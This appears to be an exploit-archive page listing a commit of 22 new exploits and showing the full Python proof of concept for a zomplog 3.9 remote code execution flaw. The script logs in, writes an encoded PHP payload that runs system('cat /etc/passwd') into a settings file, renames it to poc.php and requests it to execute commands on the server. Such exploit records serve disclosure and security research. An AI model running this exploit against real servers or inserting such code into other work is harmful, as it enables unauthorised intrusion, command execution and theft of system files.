c18d9953a2
22 changes to exploits/shellcodes/ghdb Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS) Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities Joomla HikaShop 4.7.4 - Reflected XSS Joomla VirtueMart Shopping Cart 4.0.12 - Reflected XSS mooDating 1.2 - Reflected Cross-site scripting (XSS) October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated) PaulPrinting CMS - (Search Delivery) Cross Site Scripting Perch v3.2 - Persistent Cross Site Scripting (XSS) RosarioSIS 10.8.4 - CSV Injection WordPress Plugin AN_Gradebook 5.0.1 - SQLi Zomplog 3.9 - Cross-site scripting (XSS) zomplog 3.9 - Remote Code Execution (RCE) copyparty 1.8.2 - Directory Traversal copyparty v1.8.6 - Reflected Cross Site Scripting (XSS) GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes)
58 lines
No EOL
1.9 KiB
Python
Executable file
58 lines
No EOL
1.9 KiB
Python
Executable file
#Exploit Title: zomplog 3.9 - Remote Code Execution (RCE)
|
|
#Application: zomplog
|
|
#Version: v3.9
|
|
#Bugs: RCE
|
|
#Technology: PHP
|
|
#Vendor URL: http://zomp.nl/zomplog/
|
|
#Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
|
|
#Date of found: 22.07.2023
|
|
#Author: Mirabbas Ağalarov
|
|
#Tested on: Linux
|
|
|
|
|
|
import requests
|
|
|
|
#inputs
|
|
username=input('username: ')
|
|
password=input('password: ')
|
|
|
|
#urls
|
|
login_url="http://localhost/zimplitcms/zimplit.php?action=login"
|
|
payload_url="http://localhost/zimplitcms/zimplit.php?action=saveE&file=Zsettings.js"
|
|
rename_url="http://localhost/zimplitcms/zimplit.php?action=rename&oldname=Zsettings.js&newname=poc.php"
|
|
poc_url="http://localhost/zimplitcms/poc.php"
|
|
|
|
|
|
#login
|
|
session = requests.Session()
|
|
login_data=f"lang=en&username={username}&password={password}&submit=Start!"
|
|
headers={
|
|
'Cookie' : 'ZsessionLang=en',
|
|
'Content-Type' : 'application/x-www-form-urlencoded',
|
|
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
|
|
}
|
|
login_req=session.post(login_url,headers=headers,data=login_data)
|
|
|
|
if login_req.status_code == 200:
|
|
print('Login OK')
|
|
else:
|
|
print('Login promlem.')
|
|
exit()
|
|
#payload
|
|
payload_data="html=ZmaxpicZoomW%2520%253D%2520%2522%2522%253C%253Fphp%2520echo%2520system('cat%2520%252Fetc%252Fpasswd')%253B%253F%253E%2522%253B%2520%250AZmaxpicZoomH%2520%253D%2520%2522150%2522%253B%2520%250AZmaxpicW%2520%253D%2520%2522800%2522%253B%2520%250AZmaxpicH%2520%253D%2520%2522800%2522%253B%2520"
|
|
pheaders={
|
|
'Content-Type' : 'application/x-www-form-urlencoded',
|
|
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
|
|
}
|
|
payload_req=session.post(payload_url,headers=pheaders,data=payload_data)
|
|
|
|
#rename
|
|
|
|
rename_req=session.get(rename_url)
|
|
|
|
#poc
|
|
poc_req=session.get(poc_url)
|
|
print(poc_req.text)
|
|
|
|
|
|
#youtube poc video - https://youtu.be/nn7hieGyCFs |